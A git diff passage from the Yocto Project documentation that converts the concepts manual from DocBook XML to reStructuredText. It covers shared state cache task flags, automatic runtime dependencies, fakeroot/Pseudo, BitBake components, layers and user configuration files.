+ checksum (signature) has changed from when the output was cached, the task
+ runs to populate the shared state cache, after which the contents of the
+ shared state cache is copied to ${:term:`DEPLOY_DIR_IMAGE`}. If
+ ``do_deploy`` is in the shared state cache and its signature indicates
+ that the cached output is still valid (i.e. if no relevant task inputs
+ have changed), then the contents of the shared state cache copies
+ directly to ${``DEPLOY_DIR_IMAGE``} by the ``do_deploy_setscene`` task
+ instead, skipping the ``do_deploy`` task.
+
+- The following task definition is glue logic needed to make the
+ previous settings effective:
+ ::
+
+ python do_deploy_setscene () {
+ sstate_setscene(d)
+ }
+ addtask do_deploy_setscene
+
+ ``sstate_setscene()`` takes the flags above as input and accelerates the ``do_deploy`` task
+ through the shared state cache if possible. If the task was
+ accelerated, ``sstate_setscene()`` returns True. Otherwise, it
+ returns False, and the normal ``do_deploy`` task runs. For more
+ information, see the ":ref:`setscene <bitbake:bitbake-user-manual/bitbake-user-manual-execution:setscene>`"
+ section in the BitBake User Manual.
+
+- The ``do_deploy[dirs] = "${DEPLOYDIR} ${B}"`` line creates
+ ``${DEPLOYDIR}`` and ``${B}`` before the ``do_deploy`` task runs, and
+ also sets the current working directory of ``do_deploy`` to ``${B}``.
+ For more information, see the ":ref:`bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags`"
+ section in the BitBake
+ User Manual.
+
+ .. note::
+
+ In cases where ``sstate-inputdirs`` and ``sstate-outputdirs`` would be
+ the same, you can use ``sstate-plaindirs``. For example, to preserve the
+ ${:term:`PKGD`} and ${:term:`PKGDEST`} output from the ``do_package``
+ task, use the following:
+ ::
+
+ do_package[sstate-plaindirs] = "${PKGD} ${PKGDEST}"
+
+
+- The ``do_deploy[stamp-extra-info] = "${MACHINE_ARCH}"`` line appends
+ extra metadata to the `stamp
+ file <#stamp-files-and-the-rerunning-of-tasks>`__. In this case, the
+ metadata makes the task specific to a machine's architecture. See
+ ":ref:`bitbake:ref-bitbake-tasklist`"
+ section in the BitBake User Manual for more information on the
+ ``stamp-extra-info`` flag.
+
+- ``sstate-inputdirs`` and ``sstate-outputdirs`` can also be used with
+ multiple directories. For example, the following declares
+ ``PKGDESTWORK`` and ``SHLIBWORK`` as shared state input directories,
+ which populates the shared state cache, and ``PKGDATA_DIR`` and
+ ``SHLIBSDIR`` as the corresponding shared state output directories:
+ ::
+
+ do_package[sstate-inputdirs] = "${PKGDESTWORK} ${SHLIBSWORKDIR}"
+ do_package[sstate-outputdirs] = "${PKGDATA_DIR} ${SHLIBSDIR}"
+
+- These methods also include the ability to take a lockfile when
+ manipulating shared state directory structures, for cases where file
+ additions or removals are sensitive:
+ ::
+
+ do_package[sstate-lockfile] = "${PACKAGELOCK}"
+
+Behind the scenes, the shared state code works by looking in
+:term:`SSTATE_DIR` and
+:term:`SSTATE_MIRRORS` for
+shared state files. Here is an example:
+::
+
+ SSTATE_MIRRORS ?= "file://.* https://sstate.yoctoproject.org/all/PATH;downloadfilename=PATH"
+
+.. note::
+
+ The shared state directory (``SSTATE_DIR``) is organized into two-character
+ subdirectories, where the subdirectory names are based on the first two
+ characters of the hash.
+ If the shared state directory structure for a mirror has the same structure
+ as ``SSTATE_DIR``, you must specify "PATH" as part of the URI to enable the build
+ system to map to the appropriate subdirectory.
+
+The shared state package validity can be detected just by looking at the
+filename since the filename contains the task checksum (or signature) as
+described earlier in this section. If a valid shared state package is
+found, the build process downloads it and uses it to accelerate the
+task.
+
+The build processes use the ``*_setscene`` tasks for the task
+acceleration phase. BitBake goes through this phase before the main
+execution code and tries to accelerate any tasks for which it can find
+shared state packages. If a shared state package for a task is
+available, the shared state package is used. This means the task and any
+tasks on which it is dependent are not executed.
+
+As a real world example, the aim is when building an IPK-based image,
+only the
+:ref:`ref-tasks-package_write_ipk`
+tasks would have their shared state packages fetched and extracted.
+Since the sysroot is not used, it would never get extracted. This is
+another reason why a task-based approach is preferred over a
+recipe-based approach, which would have to install the output from every
+task.
+
+Automatically Added Runtime Dependencies
+========================================
+
+The OpenEmbedded build system automatically adds common types of runtime
+dependencies between packages, which means that you do not need to
+explicitly declare the packages using
+:term:`RDEPENDS`. Three automatic
+mechanisms exist (``shlibdeps``, ``pcdeps``, and ``depchains``) that
+handle shared libraries, package configuration (pkg-config) modules, and
+``-dev`` and ``-dbg`` packages, respectively. For other types of runtime
+dependencies, you must manually declare the dependencies.
+
+- ``shlibdeps``: During the
+ :ref:`ref-tasks-package` task of
+ each recipe, all shared libraries installed by the recipe are
+ located. For each shared library, the package that contains the
+ shared library is registered as providing the shared library. More
+ specifically, the package is registered as providing the
+ `soname <https://en.wikipedia.org/wiki/Soname>`__ of the library. The
+ resulting shared-library-to-package mapping is saved globally in
+ :term:`PKGDATA_DIR` by the
+ :ref:`ref-tasks-packagedata`
+ task.
+
+ Simultaneously, all executables and shared libraries installed by the
+ recipe are inspected to see what shared libraries they link against.
+ For each shared library dependency that is found, ``PKGDATA_DIR`` is
+ queried to see if some package (likely from a different recipe)
+ contains the shared library. If such a package is found, a runtime
+ dependency is added from the package that depends on the shared
+ library to the package that contains the library.
+
+ The automatically added runtime dependency also includes a version
+ restriction. This version restriction specifies that at least the
+ current version of the package that provides the shared library must
+ be used, as if "package (>= version)" had been added to ``RDEPENDS``.
+ This forces an upgrade of the package containing the shared library
+ when installing the package that depends on the library, if needed.
+
+ If you want to avoid a package being registered as providing a
+ particular shared library (e.g. because the library is for internal
+ use only), then add the library to
+ :term:`PRIVATE_LIBS` inside
+ the package's recipe.
+
+- ``pcdeps``: During the ``do_package`` task of each recipe, all
+ pkg-config modules (``*.pc`` files) installed by the recipe are
+ located. For each module, the package that contains the module is
+ registered as providing the module. The resulting module-to-package
+ mapping is saved globally in ``PKGDATA_DIR`` by the
+ ``do_packagedata`` task.
+
+ Simultaneously, all pkg-config modules installed by the recipe are
+ inspected to see what other pkg-config modules they depend on. A
+ module is seen as depending on another module if it contains a
+ "Requires:" line that specifies the other module. For each module
+ dependency, ``PKGDATA_DIR`` is queried to see if some package
+ contains the module. If such a package is found, a runtime dependency
+ is added from the package that depends on the module to the package
+ that contains the module.
+
+ .. note::
+
+ The
+ pcdeps
+ mechanism most often infers dependencies between
+ -dev
+ packages.
+
+- ``depchains``: If a package ``foo`` depends on a package ``bar``,
+ then ``foo-dev`` and ``foo-dbg`` are also made to depend on
+ ``bar-dev`` and ``bar-dbg``, respectively. Taking the ``-dev``
+ packages as an example, the ``bar-dev`` package might provide headers
+ and shared library symlinks needed by ``foo-dev``, which shows the
+ need for a dependency between the packages.
+
+ The dependencies added by ``depchains`` are in the form of
+ :term:`RRECOMMENDS`.
+
+ .. note::
+
+ By default, ``foo-dev`` also has an ``RDEPENDS``-style dependency on
+ ``foo``, because the default value of ``RDEPENDS_${PN}-dev`` (set in
+ bitbake.conf) includes "${PN}".
+
+ To ensure that the dependency chain is never broken, ``-dev`` and
+ ``-dbg`` packages are always generated by default, even if the
+ packages turn out to be empty. See the
+ :term:`ALLOW_EMPTY` variable
+ for more information.
+
+The ``do_package`` task depends on the ``do_packagedata`` task of each
+recipe in :term:`DEPENDS` through use
+of a ``[``\ :ref:`deptask <bitbake:bitbake-user-manual/bitbake-user-manual-metadata:variable flags>`\ ``]``
+declaration, which guarantees that the required
+shared-library/module-to-package mapping information will be available
+when needed as long as ``DEPENDS`` has been correctly set.
+
+Fakeroot and Pseudo
+===================
+
+Some tasks are easier to implement when allowed to perform certain
+operations that are normally reserved for the root user (e.g.
+:ref:`ref-tasks-install`,
+:ref:`do_package_write* <ref-tasks-package_write_deb>`,
+:ref:`ref-tasks-rootfs`, and
+:ref:`do_image* <ref-tasks-image>`). For example,
+the ``do_install`` task benefits from being able to set the UID and GID
+of installed files to arbitrary values.
+
+One approach to allowing tasks to perform root-only operations would be
+to require :term:`BitBake` to run as
+root. However, this method is cumbersome and has security issues. The
+approach that is actually used is to run tasks that benefit from root
+privileges in a "fake" root environment. Within this environment, the
+task and its child processes believe that they are running as the root
+user, and see an internally consistent view of the filesystem. As long
+as generating the final output (e.g. a package or an image) does not
+require root privileges, the fact that some earlier steps ran in a fake
+root environment does not cause problems.
+
+The capability to run tasks in a fake root environment is known as
+"`fakeroot <http://man.he.net/man1/fakeroot>`__", which is derived from
+the BitBake keyword/variable flag that requests a fake root environment
+for a task.
+
+In the :term:`OpenEmbedded Build System`,
+the program that
+implements fakeroot is known as
+`Pseudo <https://www.yoctoproject.org/software-item/pseudo/>`__. Pseudo
+overrides system calls by using the environment variable ``LD_PRELOAD``,
+which results in the illusion of running as root. To keep track of
+"fake" file ownership and permissions resulting from operations that
+require root permissions, Pseudo uses an SQLite 3 database. This
+database is stored in
+``${``\ :term:`WORKDIR`\ ``}/pseudo/files.db``
+for individual recipes. Storing the database in a file as opposed to in
+memory gives persistence between tasks and builds, which is not
+accomplished using fakeroot.
+
+.. note::
+
+ If you add your own task that manipulates the same files or
+ directories as a fakeroot task, then that task also needs to run
+ under fakeroot. Otherwise, the task cannot run root-only operations,
+ and cannot see the fake file ownership and permissions set by the
+ other task. You need to also add a dependency on
+ virtual/fakeroot-native:do_populate_sysroot
+ , giving the following:
+ ::
+
+ fakeroot do_mytask () {
+ ...
+ }
+ do_mytask[depends] += "virtual/fakeroot-native:do_populate_sysroot"
+
+
+For more information, see the
+:term:`FAKEROOT* <bitbake:FAKEROOT>` variables in the
+BitBake User Manual. You can also reference the "`Why Not
+Fakeroot? <https://github.com/wrpseudo/pseudo/wiki/WhyNotFakeroot>`__"
+article for background information on Fakeroot and Pseudo.
diff --git a/documentation/overview-manual/overview-manual-concepts.xml b/documentation/overview-manual/overview-manual-concepts.xml
deleted file mode 100644
index f085dd710d..0000000000
--- a/documentation/overview-manual/overview-manual-concepts.xml
+++ /dev/null
@@ -1,3234 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id=' overview-manual-concepts'>
-<title>Yocto Project Concepts</title>
-
- <para>
- This chapter provides explanations for Yocto Project concepts that
- go beyond the surface of "how-to" information and reference (or
- look-up) material.
- Concepts such as components, the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- workflow, cross-development toolchains, shared state cache, and so
- forth are explained.
- </para>
-
- <section id='yocto-project-components'>
- <title>Yocto Project Components</title>
-
- <para>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- task executor together with various types of configuration files
- form the
- <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core</ulink>.
- This section overviews these components by describing their use and
- how they interact.
- </para>
-
- <para>
- BitBake handles the parsing and execution of the data files.
- The data itself is of various types:
- <itemizedlist>
- <listitem><para>
- <emphasis>Recipes:</emphasis>
- Provides details about particular pieces of software.
- </para></listitem>
- <listitem><para>
- <emphasis>Class Data:</emphasis>
- Abstracts common build information (e.g. how to build a
- Linux kernel).
- </para></listitem>
- <listitem><para>
- <emphasis>Configuration Data:</emphasis>
- Defines machine-specific settings, policy decisions, and
- so forth.
- Configuration data acts as the glue to bind everything
- together.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- BitBake knows how to combine multiple data sources together and
- refers to each data source as a layer.
- For information on layers, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section of the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- Following are some brief details on these core components.
- For additional information on how these components interact during
- a build, see the
- "<link linkend='openembedded-build-system-build-concepts'>OpenEmbedded Build System Concepts</link>"
- section.
- </para>
-
- <section id='usingpoky-components-bitbake'>
- <title>BitBake</title>
-
- <para>
- BitBake is the tool at the heart of the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- and is responsible for parsing the
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>,
- generating a list of tasks from it, and then executing those
- tasks.
- </para>
-
- <para>
- This section briefly introduces BitBake.
- If you want more information on BitBake, see the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
- </para>
-
- <para>
- To see a list of the options BitBake supports, use either of
- the following commands:
- <literallayout class='monospaced'>
- $ bitbake -h
- $ bitbake --help
- </literallayout>
- </para>
-
- <para>
- The most common usage for BitBake is
- <filename>bitbake <replaceable>packagename</replaceable></filename>,
- where <filename>packagename</filename> is the name of the
- package you want to build (referred to as the "target").
- The target often equates to the first part of a recipe's
- filename (e.g. "foo" for a recipe named
- <filename>foo_1.3.0-r0.bb</filename>).
- So, to process the
- <filename>matchbox-desktop_1.2.3.bb</filename> recipe file, you
- might type the following:
- <literallayout class='monospaced'>
- $ bitbake matchbox-desktop
- </literallayout>
- Several different versions of
- <filename>matchbox-desktop</filename> might exist.
- BitBake chooses the one selected by the distribution
- configuration.
- You can get more details about how BitBake chooses between
- different target versions and providers in the
- "<ulink url='&YOCTO_DOCS_BB_URL;#bb-bitbake-preferences'>Preferences</ulink>"
- section of the BitBake User Manual.
- </para>
-
- <para>
- BitBake also tries to execute any dependent tasks first.
- So for example, before building
- <filename>matchbox-desktop</filename>, BitBake would build a
- cross compiler and <filename>glibc</filename> if they had not
- already been built.
- </para>
-
- <para>
- A useful BitBake option to consider is the
- <filename>-k</filename> or <filename>--continue</filename>
- option.
- This option instructs BitBake to try and continue processing
- the job as long as possible even after encountering an error.
- When an error occurs, the target that failed and those that
- depend on it cannot be remade.
- However, when you use this option other dependencies can
- still be processed.
- </para>
- </section>
-
- <section id='overview-components-recipes'>
- <title>Recipes</title>
-
- <para>
- Files that have the <filename>.bb</filename> suffix are
- "recipes" files.
- In general, a recipe contains information about a single piece
- of software.
- This information includes the location from which to download
- the unaltered source, any source patches to be applied to that
- source (if needed), which special configuration options to
- apply, how to compile the source files, and how to package the
- compiled output.
- </para>
-
- <para>
- The term "package" is sometimes used to refer to recipes.
- However, since the word "package" is used for the packaged
- output from the OpenEmbedded build system (i.e.
- <filename>.ipk</filename> or <filename>.deb</filename> files),
- this document avoids using the term "package" when referring
- to recipes.
- </para>
- </section>
-
- <section id='overview-components-classes'>
- <title>Classes</title>
-
- <para>
- Class files (<filename>.bbclass</filename>) contain information
- that is useful to share between recipes files.
- An example is the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-autotools'><filename>autotools</filename></ulink>
- class, which contains common settings for any application that
- Autotools uses.
- The
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes'>Classes</ulink>"
- chapter in the Yocto Project Reference Manual provides
- details about classes and how to use them.
- </para>
- </section>
-
- <section id='overview-components-configurations'>
- <title>Configurations</title>
-
- <para>
- The configuration files (<filename>.conf</filename>) define
- various configuration variables that govern the OpenEmbedded
- build process.
- These files fall into several areas that define machine
- configuration options, distribution configuration options,
- compiler tuning options, general common configuration options,
- and user configuration options in
- <filename>conf/local.conf</filename>, which is found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- </para>
- </section>
- </section>
-
- <section id='overview-layers'>
- <title>Layers</title>
-
- <para>
- Layers are repositories that contain related metadata (i.e.
- sets of instructions) that tell the OpenEmbedded build system how
- to build a target.
- Yocto Project's
- <link linkend='the-yocto-project-layer-model'>layer model</link>
- facilitates collaboration, sharing, customization, and reuse
- within the Yocto Project development environment.
- Layers logically separate information for your project.
- For example, you can use a layer to hold all the configurations
- for a particular piece of hardware.
- Isolating hardware-specific configurations allows you to share
- other metadata by using a different layer where that metadata
- might be common across several pieces of hardware.
- </para>
-
- <para>
- Many layers exist that work in the Yocto Project development
- environment.
- The
- <ulink url='https://caffelli-staging.yoctoproject.org/software-overview/layers/'>Yocto Project Curated Layer Index</ulink>
- and
- <ulink url='http://layers.openembedded.org/layerindex/branch/master/layers/'>OpenEmbedded Layer Index</ulink>
- both contain layers from which you can use or leverage.
- </para>
-
- <para>
- By convention, layers in the Yocto Project follow a specific form.
- Conforming to a known structure allows BitBake to make assumptions
- during builds on where to find types of metadata.
- You can find procedures and learn about tools (i.e.
- <filename>bitbake-layers</filename>) for creating layers suitable
- for the Yocto Project in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section of the Yocto Project Development Tasks Manual.
- </para>
- </section>
-
- <section id="openembedded-build-system-build-concepts">
- <title>OpenEmbedded Build System Concepts</title>
-
- <para>
- This section takes a more detailed look inside the build
- process used by the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>,
- which is the build system specific to the Yocto Project.
- At the heart of the build system is BitBake, the task executor.
- </para>
-
- <para>
- The following diagram represents the high-level workflow of a
- build.
- The remainder of this section expands on the fundamental input,
- output, process, and metadata logical blocks that make up the
- workflow.
- </para>
-
- <para id='general-workflow-figure'>
- <imagedata fileref="figures/YP-flow-diagram.png" format="PNG" align='center' width="8in"/>
- </para>
-
- <para>
- In general, the build's workflow consists of several functional
- areas:
- <itemizedlist>
- <listitem><para>
- <emphasis>User Configuration:</emphasis>
- metadata you can use to control the build process.
- </para></listitem>
- <listitem><para>
- <emphasis>Metadata Layers:</emphasis>
- Various layers that provide software, machine, and
- distro metadata.
- </para></listitem>
- <listitem><para>
- <emphasis>Source Files:</emphasis>
- Upstream releases, local projects, and SCMs.
- </para></listitem>
- <listitem><para>
- <emphasis>Build System:</emphasis>
- Processes under the control of
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>.
- This block expands on how BitBake fetches source, applies
- patches, completes compilation, analyzes output for package
- generation, creates and tests packages, generates images,
- and generates cross-development tools.
- </para></listitem>
- <listitem><para>
- <emphasis>Package Feeds:</emphasis>
- Directories containing output packages (RPM, DEB or IPK),
- which are subsequently used in the construction of an
- image or Software Development Kit (SDK), produced by the
- build system.
- These feeds can also be copied and shared using a web
- server or other means to facilitate extending or updating
- existing images on devices at runtime if runtime package
- management is enabled.
- </para></listitem>
- <listitem><para>
- <emphasis>Images:</emphasis>
- Images produced by the workflow.
- </para></listitem>
- <listitem><para>
- <emphasis>Application Development SDK:</emphasis>
- Cross-development tools that are produced along with
- an image or separately with BitBake.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id="user-configuration">
- <title>User Configuration</title>
-
- <para>
- User configuration helps define the build.
- Through user configuration, you can tell BitBake the
- target architecture for which you are building the image,
- where to store downloaded source, and other build properties.
- </para>
-
- <para>
- The following figure shows an expanded representation of the
- "User Configuration" box of the
- <link linkend='general-workflow-figure'>general workflow figure</link>:
- </para>
-
- <para>
- <imagedata fileref="figures/user-configuration.png" align="center" width="8in" depth="4.5in" />
- </para>
-
- <para>
- BitBake needs some basic configuration files in order to
- complete a build.
- These files are <filename>*.conf</filename> files.
- The minimally necessary ones reside as example files in the
- <filename>build/conf</filename> directory of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- For simplicity, this section refers to the Source Directory as
- the "Poky Directory."
- </para>
-
- <para>
- When you clone the
- <ulink url='&YOCTO_DOCS_REF_URL;#poky'>Poky</ulink>
- Git repository or you download and unpack a Yocto Project
- release, you can set up the Source Directory to be named
- anything you want.
- For this discussion, the cloned repository uses the default
- name <filename>poky</filename>.
- <note>
- The Poky repository is primarily an aggregation of existing
- repositories.
- It is not a canonical upstream source.
- </note>
- </para>
-
- <para>
- The <filename>meta-poky</filename> layer inside Poky contains
- a <filename>conf</filename> directory that has example
- configuration files.
- These example files are used as a basis for creating actual
- configuration files when you source
- <ulink url='&YOCTO_DOCS_REF_URL;#structure-core-script'><filename>&OE_INIT_FILE;</filename></ulink>,
- which is the build environment script.
- </para>
-
- <para>
- Sourcing the build environment script creates a
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- if one does not already exist.
- BitBake uses the Build Directory for all its work during
- builds.
- The Build Directory has a <filename>conf</filename> directory
- that contains default versions of your
- <filename>local.conf</filename> and
- <filename>bblayers.conf</filename> configuration files.
- These default configuration files are created only if versions
- do not already exist in the Build Directory at the time you
- source the build environment setup script.
- </para>
-
- <para>
- Because the Poky repository is fundamentally an aggregation of
- existing repositories, some users might be familiar with
- running the <filename>&OE_INIT_FILE;</filename> script
- in the context of separate
- <ulink url='&YOCTO_DOCS_REF_URL;#oe-core'>OpenEmbedded-Core</ulink>
- and BitBake repositories rather than a single Poky repository.
- This discussion assumes the script is executed from
- within a cloned or unpacked version of Poky.
- </para>
-
- <para>
- Depending on where the script is sourced, different
- sub-scripts are called to set up the Build Directory
- (Yocto or OpenEmbedded).
- Specifically, the script
- <filename>scripts/oe-setup-builddir</filename> inside the
- poky directory sets up the Build Directory and seeds the
- directory (if necessary) with configuration files appropriate
- for the Yocto Project development environment.
- <note>
- The <filename>scripts/oe-setup-builddir</filename> script
- uses the <filename>$TEMPLATECONF</filename> variable to
- determine which sample configuration files to locate.
- </note>
- </para>
-
- <para>
- The <filename>local.conf</filename> file provides many
- basic variables that define a build environment.
- Here is a list of a few.
- To see the default configurations in a
- <filename>local.conf</filename> file created by the build
- environment script, see the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample'><filename>local.conf.sample</filename></ulink>
- in the <filename>meta-poky</filename> layer:
- <itemizedlist>
- <listitem><para>
- <emphasis>Target Machine Selection:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Download Directory:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Shared State Directory:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Build Output:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TMPDIR'><filename>TMPDIR</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Distribution Policy:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Packaging Format:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>SDK Target Architecture:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SDKMACHINE'><filename>SDKMACHINE</filename></ulink>
- variable.
- </para></listitem>
- <listitem><para>
- <emphasis>Extra Image Packages:</emphasis>
- Controlled by the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink>
- variable.
- </para></listitem>
- </itemizedlist>
- <note>
- Configurations set in the
- <filename>conf/local.conf</filename> file can also be set
- in the <filename>conf/site.conf</filename> and
- <filename>conf/auto.conf</filename> configuration files.
- </note>
- </para>
-
- <para>
- The <filename>bblayers.conf</filename> file tells BitBake what
- layers you want considered during the build.
- By default, the layers listed in this file include layers
- minimally needed by the build system.
- However, you must manually add any custom layers you have
- created.
- You can find more information on working with the
- <filename>bblayers.conf</filename> file in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-your-layer'>Enabling Your Layer</ulink>"
- section in the Yocto Project Development Tasks Manual.
- </para>
-
- <para>
- The files <filename>site.conf</filename> and
- <filename>auto.conf</filename> are not created by the
- environment initialization script.
- If you want the <filename>site.conf</filename> file, you
- need to create that yourself.
- The <filename>auto.conf</filename> file is typically created by
- an autobuilder:
- <itemizedlist>
- <listitem><para>
- <emphasis><filename>site.conf</filename>:</emphasis>
- You can use the <filename>conf/site.conf</filename>
- configuration file to configure multiple
- build directories.
- For example, suppose you had several build environments
- and they shared some common features.
- You can set these default build properties here.
- A good example is perhaps the packaging format to use
- through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_CLASSES'><filename>PACKAGE_CLASSES</filename></ulink>
- variable.</para>
-
- <para>One useful scenario for using the
- <filename>conf/site.conf</filename> file is to extend
- your
- <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>
- variable to include the path to a
- <filename>conf/site.conf</filename>.
- Then, when BitBake looks for Metadata using
- <filename>BBPATH</filename>, it finds the
- <filename>conf/site.conf</filename> file and applies
- your common configurations found in the file.
- To override configurations in a particular build
- directory, alter the similar configurations within
- that build directory's
- <filename>conf/local.conf</filename> file.
- </para></listitem>
- <listitem><para>
- <emphasis><filename>auto.conf</filename>:</emphasis>
- The file is usually created and written to by
- an autobuilder.
- The settings put into the file are typically the
- same as you would find in the
- <filename>conf/local.conf</filename> or the
- <filename>conf/site.conf</filename> files.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- You can edit all configuration files to further define
- any particular build environment.
- This process is represented by the "User Configuration Edits"
- box in the figure.
- </para>
-
- <para>
- When you launch your build with the
- <filename>bitbake <replaceable>target</replaceable></filename>
- command, BitBake sorts out the configurations to ultimately
- define your build environment.
- It is important to understand that the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-system-term'>OpenEmbedded build system</ulink>
- reads the configuration files in a specific order:
- <filename>site.conf</filename>, <filename>auto.conf</filename>,
- and <filename>local.conf</filename>.
- And, the build system applies the normal assignment statement
- rules as described in the
- "<ulink url='&YOCTO_DOCS_BB_URL;#bitbake-user-manual-metadata'>Syntax and Operators</ulink>"
- chapter of the BitBake User Manual.
- Because the files are parsed in a specific order, variable
- assignments for the same variable could be affected.
- For example, if the <filename>auto.conf</filename> file and
- the <filename>local.conf</filename> set
- <replaceable>variable1</replaceable> to different values,
- because the build system parses <filename>local.conf</filename>
- after <filename>auto.conf</filename>,
- <replaceable>variable1</replaceable> is assigned the value from
- the <filename>local.conf</filename> file.
- </para>
- </section>
-
- <section id="metadata-machine-configuration-and-policy-configuration">
- <title>Metadata, Machine Configuration, and Policy Configuration</title>
-
- <para>
- The previous section described the user configurations that
- define BitBake's global behavior.
- This section takes a closer look at the layers the build system
- uses to further control the build.
- These layers provide Metadata for the software, machine, and
- policies.
- </para>
-
- <para>
- In general, three types of layer input exists.
- You can see them below the "User Configuration" box in the
- <link linkend='general-workflow-figure'>general workflow figure</link>:
- <itemizedlist>
- <listitem><para>
- <emphasis>Metadata (<filename>.bb</filename> + Patches):</emphasis>
- Software layers containing user-supplied recipe files,
- patches, and append files.
- A good example of a software layer might be the
- <ulink url='https://github.com/meta-qt5/meta-qt5'><filename>meta-qt5</filename></ulink>
- layer from the
- <ulink url='http://layers.openembedded.org/layerindex/branch/master/layers/'>OpenEmbedded Layer Index</ulink>.
- This layer is for version 5.0 of the popular
- <ulink url='https://wiki.qt.io/About_Qt'>Qt</ulink>
- cross-platform application development framework for
- desktop, embedded and mobile.
- </para></listitem>
- <listitem><para>
- <emphasis>Machine BSP Configuration:</emphasis>
- Board Support Package (BSP) layers (i.e. "BSP Layer"
- in the following figure) providing machine-specific
- configurations.
- This type of information is specific to a particular
- target architecture.
- A good example of a BSP layer from the
- <link linkend='gs-reference-distribution-poky'>Poky Reference Distribution</link>
- is the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-yocto-bsp'><filename>meta-yocto-bsp</filename></ulink>
- layer.
- </para></listitem>
- <listitem><para>
- <emphasis>Policy Configuration:</emphasis>
- Distribution Layers (i.e. "Distro Layer" in the
- following figure) providing top-level or general
- policies for the images or SDKs being built for a
- particular distribution.
- For example, in the Poky Reference Distribution the
- distro layer is the
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky'><filename>meta-poky</filename></ulink>
- layer.
- Within the distro layer is a
- <filename>conf/distro</filename> directory that
- contains distro configuration files (e.g.
- <ulink url='&YOCTO_GIT_URL;/cgit/cgit.cgi/poky/tree/meta-poky/conf/distro/poky.conf'><filename>poky.conf</filename></ulink>
- that contain many policy configurations for the
- Poky distribution.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- The following figure shows an expanded representation of
- these three layers from the
- <link linkend='general-workflow-figure'>general workflow figure</link>:
- </para>
-
- <para>
- <imagedata fileref="figures/layer-input.png" align="center" width="8in" depth="8in" />
- </para>
-
- <para>
- In general, all layers have a similar structure.
- They all contain a licensing file
- (e.g. <filename>COPYING.MIT</filename>) if the layer is to be
- distributed, a <filename>README</filename> file as good
- practice and especially if the layer is to be distributed, a
- configuration directory, and recipe directories.
- You can learn about the general structure for layers used with
- the Yocto Project in the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#creating-your-own-layer'>Creating Your Own Layer</ulink>"
- section in the Yocto Project Development Tasks Manual.
- For a general discussion on layers and the many layers from
- which you can draw, see the
- "<link linkend='overview-layers'>Layers</link>" and
- "<link linkend='the-yocto-project-layer-model'>The Yocto Project Layer Model</link>"
- sections both earlier in this manual.
- </para>
-
- <para>
- If you explored the previous links, you discovered some
- areas where many layers that work with the Yocto Project
- exist.
- The
- <ulink url="http://git.yoctoproject.org/">Source Repositories</ulink>
- also shows layers categorized under "Yocto Metadata Layers."
- <note>
- Layers exist in the Yocto Project Source Repositories that
- cannot be found in the OpenEmbedded Layer Index.
- These layers are either deprecated or experimental
- in nature.
- </note>
- </para>
-
- <para>
